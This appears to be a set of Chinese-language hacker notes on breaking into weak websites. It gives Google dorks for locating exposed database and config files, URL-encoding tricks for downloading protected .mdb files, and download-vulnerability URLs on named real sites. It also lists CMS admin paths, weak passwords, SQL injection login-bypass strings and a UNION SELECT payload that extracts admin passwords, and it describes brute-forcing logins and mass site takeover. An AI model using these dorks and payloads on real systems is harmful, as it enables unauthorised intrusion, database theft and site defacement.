弱漏洞利用网站
网站暴库漏洞
暴库(常是Access数据库,文件格式:data.mdb;SQLserver、MySQL--->数据库连接文件),就是通过一些技术或者程序漏洞得到数据库的地址,并将数据库非法下载到本地,
hacker非常乐意这种事件的发生,在得到网站数据库之后,就可以得到网站管理员的账号和密码,对网站进行破坏与管理,也能通过数据库的道德网站的隐私信息,甚至是最高权限。(目录遍历漏洞)
利用方法
inurl:/inc/conn.asp
inurl:inc+conn.asp to parent directort intext:
inurl:/inc/conn.asp
inurl:/inc+conn.asp to parent dirctory
所有可以目录浏览的网页都有一些相同的地方,主要有以下几点:
to parent directory
last madifief Description
转到父目录
而利用Google语法来搜索的语句有:
intitle intext inurl site filetype等
搜索域名后缀,常见的域名后缀有:
com net mil org info gov edu biz coop areo pro int arpa
e.g
intext:to parent directory + intext:mdb site:fudan.edu.cn
inc/conn.asp--->inc%5cconn.asp(MySQL数据库与可能的路径)
暴库绕过、过防下载
#sdsf.mdb
下载时改成 %23sdsf.mdb
#@!$%^&*asfkladsf@!#.mdb
%23@%21%24%25%5E%26%2aasdfkladsf@%21%23.mdb
高级语法暴库
inurl:./.. admin ../.. add..
inurl:./.. admin../..del..
inurl:/.asp <id=<%<%<%
下载漏洞
http://ipo.snnu.edu.cn/
http://ipo.snnu.edu.cn/shida/UploadFiles/indentAttFile/201206122041778.doc
http://ipo.snnu.edu.cn/down.asp?fileup=shida/UploadFiles/indentAttFile/2012061222041778.doc
http://www.sxzzy.cn/ggis/news/down.asp?FileName=doc/2101-5/2012053010329973.doc
下载漏洞利用
通过蜘蛛爬行,找到该URL,下载conn.asp config.php config.asp db.mdb
网站后台密码爆破(弱口令 bp)
为了方便管理网站,cms系统畅游管理员后台管理接口,输入账号密码登录进行管理
常见后台
网站常见的cms管理系统有:
织梦 idscuz 帝国 phpweb WordPress aspcms 科讯 南方 良精 ecshop等
对应的后台:
dede admin.php e/admin admin.php wp-admin admin admin admin admin admin
还有可能:manager login_admin login_manage login.asp
弱口令猜解
常见弱口令:admin admin888 admin123 123456等等
逻辑万能秘钥:
asp--> 'ro' = 'or'
php--> admin' or 1=1== admin' or '1'='1
破解工具:burpsuite discuz破解器 py脚本 httpfuzzer(针对带验证码的)
针对性的一些工具:PKav HTTP Fuzzer
将找到的请求包放进去(请求地址,请求包),对密码部分添加标记,对验证码部分添加标记,然后暴力破解。
网站漏洞EXP的利用
EXP是exploit(漏洞利用)的缩写。当我们cms出现漏洞的时候,针对漏洞原理可以写出针对该漏洞的exploit。
有的时候exp可以直接添加管理员或者getshell,爆出管理员账号密码,数据库账号密码。
EXP利用
主流网站基本上都有漏洞和exp
e.g 织梦 phpcms strusl phpweb ...
EXP收集
百度 交流 利用工具
批量检测站点
常用于某一类型的漏洞站点的安全检测
批量拿站
关键词:
有限公司 -- powered by AspCMS v2.0
powered by AspCms 2
powered by AspCms 2.0
AspCms 2.0
powere
关键字:inurl:newgoods.asp:action_key_order=news
利用方法:admin_shopxp/upLoad_bm.asp
漏洞利用:phpweb漏洞
关键字:
inurl:/class/?1.html
inurl:class/index.php?catid=0
inurl:/page/html/?1.html
inurl:news/html/?411.htm
默认后台地址:/admin.php
注入地址:
down/class/index.php?myord=1
news/class/index.php?showtag=
万能密码 admin 'or '1' =' 1
织梦批量,搜索关键字:
powered by DedeCMS_V57_UTF8_SP12004-2011 DesDev LNC
inurl:shopxp_news.asp
TEXTBOX2.Asp?action=madify&news%69d=122%20and%201=2%20union%20select%201,2,admin%2bpassword,4,5,6,7%20from%20shopxp_admin
2019-04-25 11:02:43